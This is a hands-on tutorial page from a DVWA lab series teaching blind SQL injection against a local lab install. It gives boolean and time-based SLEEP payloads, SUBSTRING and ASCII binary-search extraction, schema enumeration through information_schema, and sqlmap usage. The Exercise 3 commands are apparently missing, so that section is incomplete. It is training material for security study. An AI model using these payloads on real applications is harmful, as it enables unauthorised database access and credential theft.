⚠️ Lab Environment Only: SQL injection techniques must only be practised against your own DVWA installation or explicitly authorised bug bounty targets. Blind SQLi against production systems without authorisation is illegal and potentially causes significant database load through its high request volume.
DVWA SQL injection blind lab 2026 is where SQLi stops being easy and starts being real. In Lab 7 you ran SQL injection and saw the data returned in the page response — that is the best-case scenario for an attacker, and the rarest in practice. Most SQL injection in production applications produces no visible output. No error message. No data echoed back. Just a page that loads, or does not, or takes longer than expected. Today you learn to extract a complete database schema from a blind injection point using only those three signals.
🎯 What You’ll Master in Lab 11
Confirm a blind SQL injection point using boolean true/false conditions
Extract the database name character by character using boolean-based technique
Confirm injection using time-based SLEEP payloads when page output does not change
Use binary search logic to reduce requests per character from 128 to 7
Automate full database extraction using SQLmap blind techniques
⏱️ 55 min read · 3 hands-on exercises
📊 Have you completed Lab 7 — SQL Injection (basic)?
✅ Lab 7 is the prerequisite — it covers UNION-based SQLi and the core injection syntax that blind techniques build on. If you have not done Lab 7, start there. If you are comfortable with SQL injection fundamentals, Lab 11 adds the inference layer that makes exploitation possible when the application hides all output.
In Lab 7 you exploited SQL injection with visible output — UNION-based queries returned data directly in the page. The DVWA lab series separates basic and blind SQL injection into two labs deliberately: the mechanics are different, the techniques are different, and the tooling requirements are different. Lab 7 is best-case exploitation. Lab 11 is the real world.
Blind vs Error-Based vs Union SQLi — Understanding the Difference
SQL injection vulnerabilities fall into three broad categories based on how data can be extracted from them. Error-based SQLi surfaces database error messages in the response — these contain data that can be read directly. UNION-based SQLi (Lab 7) appends a second SELECT statement whose results are included in the normal page output. Both require the application to reflect some database content back to the user.
Blind SQLi requires neither. The application executes your injected SQL but returns no database content in the response. You have only two inference channels: whether the page response content changes between a true and false condition (boolean-based), and whether the response takes longer than expected (time-based). Data is extracted one bit at a time by asking the database a series of yes/no questions. This is slower, noisier in terms of request volume, and more technically demanding — but it works on applications that specifically suppress all error output and return identical content regardless of query results.
securityelites.com
Three SQLi Types — Output Requirements Comparison
UNION-BASED (Lab 7)
Application must return query results in page · Easiest to exploit · Rarest in production
ERROR-BASED
Application must display database error messages · Common in poorly configured apps
BLIND (Lab 11)
No output required — uses page behaviour or timing as inference · Most common in real apps
📸 SQLi type comparison — blind injection works on the widest range of real applications because it requires no data reflection, only observable differences in application behaviour.
Boolean-Based — Confirming the Injection Point
The first step in blind SQLi is confirming that an injection point exists and that the application’s response actually changes between true and false SQL conditions. Without this differentiation, there is no inference channel for data extraction.
⚡ EXERCISE 1 — KALI TERMINAL (20 MIN)
Confirm the Blind SQLi Point and Extract the Database Name Manually
BOOLEAN BLIND — STEP BY STEP CONFIRMATION AND EXTRACTION
## Navigate to DVWA SQL Injection (Blind)
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/
## Step 1: Establish baseline — valid user ID returns “User ID exists”
User ID: 1
→ “User ID exists in the database.”
## Step 2: Test boolean TRUE condition
User ID: 1′ AND 1=1– –
→ “User ID exists in the database.” ← TRUE returns normal
## Step 3: Test boolean FALSE condition
User ID: 1′ AND 1=2– –
→ “User ID is MISSING from the database.” ← FALSE returns different
## CONFIRMED: Different responses = boolean blind injection exists
## Step 4: Find the database name length
User ID: 1′ AND LENGTH(database())=1– –
→ MISSING (false — length is not 1)
User ID: 1′ AND LENGTH(database())=4– –
→ EXISTS (true — database name is 4 characters)
## Step 5: Extract first character of database name
User ID: 1′ AND SUBSTRING(database(),1,1)=’a’– –
→ MISSING (not ‘a’)
User ID: 1′ AND SUBSTRING(database(),1,1)=’d’– –
→ EXISTS (first char is ‘d’)
## Continue for chars 2-4 to spell out full database name: “dvwa”
User ID: 1′ AND SUBSTRING(database(),2,1)=’v’– –
User ID: 1′ AND SUBSTRING(database(),3,1)=’w’– –
User ID: 1′ AND SUBSTRING(database(),4,1)=’a’– –
→ Database name: dvwa ✓
✅ What you just learned: Boolean blind injection extracts data through a series of yes/no questions. Each SUBSTRING() query asks “is the character at position N equal to X?” — the page response (EXISTS vs MISSING) is the answer. The database name “dvwa” required 4 length checks + ~26 character guesses per position = approximately 108 requests for this 4-character name. In a real application this methodology extracts any data value, including password hashes, API keys, and user records, one character at a time.
📸 Screenshot both TRUE and FALSE responses side by side and share in #dvwa-labs on Discord. Tag #blindsqli2026
Boolean-Based Extraction — Database Name Character by Character
The SUBSTRING and LENGTH queries in Exercise 1 demonstrate the manual extraction method. In practice, the same pattern extends to extract any database content: replace database() with a subquery against information_schema.tables to enumerate table names, then query specific tables for data.
BOOLEAN BLIND — ENUMERATING TABLES AND COLUMNS
## Count tables in the dvwa database
1′ AND (SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=database())=2– –
→ EXISTS — dvwa has exactly 2 tables
## Extract first table name length
1′ AND LENGTH((SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1))=8– –
→ EXISTS — first table name is 8 characters
## Extract first character of first table name
1′ AND SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1),1,1)=’g’– –
→ EXISTS — first char is ‘g’ (guestbook)
## Extract second table name (LIMIT 1,1)
1′ AND SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 1,1),1,1)=’u’– –
→ EXISTS — second table starts with ‘u’ (users)
Time-Based Blind SQLi — SLEEP() as an Inference Channel
Time-based blind SQLi is used when the application returns identical page content for both true and false conditions — eliminating boolean-based inference. Instead of observing content differences, the attacker measures response time. If the injected condition is true, SLEEP(N) pauses database execution for N seconds before returning. If false, the response returns immediately.
⚡ EXERCISE 2 — KALI TERMINAL (15 MIN)
Confirm Blind SQLi Using Time-Based SLEEP() and Extract Data via Timing
User ID: 1′ AND IF(database()=’dvwa’,SLEEP(5),0)– –
→ Response takes 5 seconds (true — database is ‘dvwa’)
## Step 3: Conditional SLEEP — FALSE condition
User ID: 1′ AND IF(database()=’test’,SLEEP(5),0)– –
→ Response returns immediately (false — database is not ‘test’)
## Step 4: Extract first character via timing
User ID: 1′ AND IF(SUBSTRING(database(),1,1)=’d’,SLEEP(3),0)– –
→ 3-second delay = TRUE = first char is ‘d’
User ID: 1′ AND IF(SUBSTRING(database(),1,1)=’e’,SLEEP(3),0)– –
→ Immediate = FALSE = not ‘e’
## Note: Use SLEEP(2) not SLEEP(5) to speed up manual extraction
## Automate with sqlmap –technique=T for faster results
✅ What you just learned: Time-based blind SQLi transforms the database’s execution time into a binary data channel. The IF(condition, SLEEP(N), 0) pattern converts every yes/no question into a timing signal — delay means true, immediate means false. Note how much slower this is compared to boolean blind: each TRUE answer requires waiting for the sleep duration. In a real engagement, time-based is used only when boolean blind is unavailable. The DevTools Network tab showing the response time on each request is exactly the monitoring you would use to manually verify time-based payloads.
📸 Screenshot DevTools Network showing a 5-second response time for your SLEEP(5) payload and share in #dvwa-labs on Discord.
Binary Search Optimisation — Reducing Requests from 128 to 7
Linear character guessing (a, b, c, d, e, f…) requires up to 128 requests per character. Binary search requires only 7. Instead of guessing a specific character, binary search asks “is this character’s ASCII value greater than or less than the midpoint?” and progressively halves the search space.
BINARY SEARCH BLIND SQLi — 7 REQUESTS PER CHARACTER
## Binary search for SUBSTRING(database(),1,1)
## ASCII range: 32-127. Midpoint: 79 (‘O’)
1′ AND ASCII(SUBSTRING(database(),1,1))>79– –
→ MISSING (false) — char is ≤ 79, range now 32-79
## Midpoint of 32-79 = 55 (‘7’)
1′ AND ASCII(SUBSTRING(database(),1,1))>55– –
→ EXISTS (true) — char is > 55, range now 56-79
## Midpoint of 56-79 = 67 (‘C’)
1′ AND ASCII(SUBSTRING(database(),1,1))>67– –
→ EXISTS (true) — char > 67, range now 68-79
## Continue narrowing… after 7 requests: ASCII 100 = ‘d’
## Verify:
1′ AND ASCII(SUBSTRING(database(),1,1))=100– –
→ EXISTS — char is ASCII 100 = ‘d’ ✓
## 7 requests vs 100 for linear search — 93% fewer requests
SQLmap Automation — Full Schema Extraction via Blind Techniques
⚡ EXERCISE 3 — KALI TERMINAL (20 MIN)
Automate Full Database Extraction Using SQLmap Blind Techniques
⏱️ Time: 20 minutes · DVWA Low security, Kali terminal
SQLMAP BLIND EXTRACTION — FULL WORKFLOW
# Step 1: Get your PHPSESSID from DVWA (logged in browser)
# DevTools → Application → Cookies → copy PHPSESSID value
# Observe: boolean-based is significantly faster than time-based
✅ What you just learned: SQLmap’s –technique=B restricts it to boolean-blind only, showing you exactly what the automated tool is doing under the hood — the same SUBSTRING and ASCII comparisons you did manually in Exercise 1, but running thousands per second with binary search optimisation. The users table dump through a blind injection point — with no direct SQL output ever visible in any response — is the proof that blind SQLi is just as dangerous as any other form. The time comparison between -B and -T in Step 5 makes the performance cost of time-based concretely visible.
📸 Screenshot SQLmap’s –dump output extracting the users table and share in #dvwa-labs on Discord.
🧠 QUICK CHECK — Lab 11
You inject 1' AND 1=1-- - and the page shows “Record found”. You inject 1' AND 1=2-- - and the page shows “Record found” again — identical response. Is boolean-based blind SQL injection viable here?
📋 Key Payloads — Lab 11 Blind SQLi Reference Card
1′ AND 1=1– – / 1′ AND 1=2– –Boolean confirmation — different responses = injectable
1′ AND LENGTH(database())=N– –Find database name length — increment N until EXISTS
1′ AND SUBSTRING(database(),N,1)=’X’– –Extract Nth char — try each ASCII character at each position
1′ AND ASCII(SUBSTRING(database(),N,1))>M– –Binary search — halves search space, 7 requests per char
You can now extract data from SQL injection vulnerabilities that produce no visible output — the form of SQLi that appears in most real-world applications. Boolean blind, time-based, binary search, and SQLmap automation are now in your toolkit.
❓ Frequently Asked Questions
What is blind SQL injection?
Blind SQLi is SQL injection where no data or errors are returned in the response. Data is extracted by observing application behaviour changes between true and false conditions (boolean-based) or by measuring response times (time-based). Despite no visible output, a complete database schema can still be extracted.
What is the difference between boolean-based and time-based blind SQLi?
Boolean-based uses page content differences (EXISTS vs MISSING) as a yes/no signal. Time-based uses response delay (SLEEP(N)) as the signal — used when page content is identical for all conditions. Boolean-based is faster; time-based is the fallback when no content difference is observable.
How many requests does blind SQLi require to extract data?
Linear search: up to 128 requests per character. Binary search: 7 requests per character. SQLmap uses binary search automatically. A 10-character password hash requires ~70 binary-search requests or ~1,280 linear-search requests.
Can SQLmap automatically exploit blind SQL injection?
Yes. Use –technique=B for boolean-blind or –technique=T for time-based. SQLmap handles binary search, character encoding, and full schema extraction automatically. Use –dbs to enumerate databases, –tables to list tables, and –dump to extract data.
Why is time-based blind SQLi slower than boolean-based?
Each TRUE condition requires waiting for the SLEEP duration before the response returns. With SLEEP(2) and binary search for a 6-character name, each true answer costs 2 extra seconds. Boolean-based has no artificial delay — response differences are near-instant.
What comes after blind SQL injection in the DVWA lab series?
Lab 12 covers DOM-Based XSS — a client-side JavaScript execution vulnerability processed entirely by the browser’s DOM without server involvement. After two SQLi labs (7 and 11), Lab 12 returns to XSS with its most technically distinct variant.
← Previous
Lab 10: DVWA Weak Session IDs Lab 2026
Next →
Lab 12: DVWA SQL Injection SQLMAP Lab 2026
📚 Further Reading
DVWA SQL Injection Lab 2026 (Lab 7)— Lab 7 covers union-based and error-based SQL injection — the prerequisite techniques that blind injection builds on. Complete Lab 7 before this one if you have not already.
DVWA Lab Series Hub— The complete 30-lab DVWA index — Labs 7 and 11 together provide complete SQL injection coverage from basic error-based through to advanced blind extraction.
SQL Injection Tutorial 2026— The complete SQL injection guide covering all injection types, database-specific syntax differences, WAF bypass techniques, and real-world exploitation patterns.
PortSwigger Blind SQL Injection Labs— Official PortSwigger Web Academy blind SQLi track — five labs progressing from basic conditional responses through time-based extraction and out-of-band techniques.
SQLmap Official Documentation— Complete SQLmap documentation covering all detection techniques, injection modes, extraction commands, and tamper scripts for evading WAF filters.
ME
Mr Elite
Owner, SecurityElites.com
The first time blind SQLi clicked for me was watching a query run character by character in SQLmap’s verbose output mode. Each line showed exactly the question being asked — “is position 3 of the admin password hash greater than ASCII 79?” — and the TRUE or FALSE response that narrowed the range. After about three minutes, the full MD5 hash of the admin password appeared in the terminal. No error message in any response. No data echoed anywhere. Just a web page saying “Record exists” or “Record missing” dozens of times, and a password hash assembled entirely from those binary signals. That is when I understood why experienced testers say that any SQL injection vulnerability is effectively full database access — the output method is a secondary concern.
Leave a Reply